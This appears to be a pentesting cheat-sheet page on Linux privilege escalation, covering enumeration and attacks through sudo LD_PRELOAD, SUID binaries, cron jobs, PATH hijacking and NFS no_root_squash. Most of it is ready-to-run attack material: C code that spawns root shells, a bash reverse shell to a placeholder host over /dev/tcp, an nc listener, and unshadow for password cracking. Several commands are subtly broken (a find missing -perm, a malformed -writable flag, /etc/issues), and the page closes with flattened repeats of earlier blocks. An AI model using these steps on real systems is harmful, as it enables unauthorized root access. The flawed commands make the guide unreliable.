Linux Privilege Escalation

Enumeration

# Print hostname 
hostname

# Kernel information 
uname -a 

# Processes 
/proc/version

# Systems 
/etc/issues

# Processes 
ps 

# Env variables 
env

# List sudo commands 
sudo -l 

# Connections 
netstat

Kernel Exploits

The Kernel exploit methodology is simple:

Identify the kernel version
Search and find an exploit code for the kernel version of the target system
Run the exploit

You can transfer the exploit code from your machine to the target system using the SimpleHTTPServer Python module and wget respectively.

# python 2 
python -m SimpleHTTPServer 8000

# python 3
python -m http.server 8000

Sudo

The steps of this privilege escalation vector can be summarized as follows:

Run sudo -l
Check for LD_PRELOAD (with the env_keep option)
Write a simple C code compiled as a share object (.so extension) file
Run the program with sudo rights and the LD_PRELOAD option pointing to our .so file

# This C code spawns a root shell 
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main (void) {
	setuid(0);
	setgid(0);
	system("/bin/bash -p");
	return 0;
}

# Compile the code 
gcc -fPIC -shared -o shell.so shell.c -nostartfiles

# Run the program
sudo LD_PRELOAD=/home/user/ldpreload/shell.so find

SUID

# List files that have SUID or SGID bits set
find / -type f -04000 -ls 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

# Use unshadow to create a file crackable by John The Ripper 
unshadow passwd.txt shadow.txt > passwords.txt

Capabilities

# Get capabilities and redirect errors 
getcap -r / 2>/dev/null

Cron Jobs

Crontab is always worth checking as it can sometimes lead to easy privilege escalation vectors. The following scenario is not uncommon in companies that do not have a certain cyber security maturity level:

System administrators need to run a script at regular intervals.
They create a cron job to do this
After a while, the script becomes useless, and they delete it
They do not clean the relevant cron job

Two points to note:

The command syntax will vary depending on the available tools. (e.g. nc will probably not support the -e option you may have seen used in other cases)
We should always prefer to start reverse shells, as we not want to compromise the system integrity during a real penetration testing engagement.

# Show cron jobs 
cat /etc/crontab

# spawn a shell 
bash -i >& /dev/tcp/x.x.x.x/xxxx 0>&1

# run listener on attacking machine 
nc -nlvp xxxx

Path

Depends entirely on the existing configuration of the target system, so be sure you can answer the questions below before trying this.

What folders are located under $PATH
Does your current user have write privileges for any of these folders?
Can you modify $PATH?
Is there a script/application you can start that will be affected by this vulnerability?

# This code tries to launch a system binary called "thm"
# include<unistd.h>

void main()
{ setuid(0);
  setgid(0);
  system("thm");
}

# search for writable folders 
find / - writable 2>/dev/null

# search alternative
find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u

#compare the previous results with PATH 
echo $PATH

# Add /tmp to PATH 
export PATH=/tmp:$PATH

# Make sure script is executable, 777 permissions and SUID set 
chmod 777 script.c 
chmod +x script.c
chmod +s script.c

NFS

The critical element for this privilege escalation vector is the no_root_squash option. By default, NFS will change the root user to nfsnobody and strip any file from operating with root privileges. If the no_root_squash option is present on a writable share, we can create an executable with SUID bit set and run it on the target system.

# Print NFS configuration 
cat /etc/exports

# Enumerate mountable shares in attacking machine 
showmount -e x.x.x.x

# mount the share 
mkdir /tmp/target_shares 
mount -o rw x.x.x.x:/share_name /tmp/target_shares

# Compile the nfs script 
gcc nfs.c -o nfs -w 

# Set SUID 
chmod +s nfs

# Set permissions 
chmod 777 nfs

# Execute script on the target machine (should get a root shell)
./nfs

# Scripts runs bash on the target machine 
int main()
{ setgid(0);
  setuid(0);
  system("/bin/bash");
  return 0;
}

PreviousPrivilege Escalation NextWindows Privilege Escalation

Last updated 1 year ago

# Print hostname hostname # Kernel information uname -a # Processes /proc/version # Systems /etc/issues # Processes ps # Env variables env # List sudo commands sudo -l # Connections netstat

# List files that have SUID or SGID bits set find / -type f -04000 -ls 2>/dev/null find / -user root -perm -4000 -exec ls -ldb {} \; # Use unshadow to create a file crackable by John The Ripper unshadow passwd.txt shadow.txt > passwords.txt

# search for writable folders find / - writable 2>/dev/null # search alternative find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u #compare the previous results with PATH echo $PATH # Add /tmp to PATH export PATH=/tmp:$PATH # Make sure script is executable, 777 permissions and SUID set chmod 777 script.c chmod +x script.c chmod +s script.c

# Print NFS configuration cat /etc/exports # Enumerate mountable shares in attacking machine showmount -e x.x.x.x # mount the share mkdir /tmp/target_shares mount -o rw x.x.x.x:/share_name /tmp/target_shares # Compile the nfs script gcc nfs.c -o nfs -w # Set SUID chmod +s nfs # Set permissions chmod 777 nfs # Execute script on the target machine (should get a root shell) ./nfs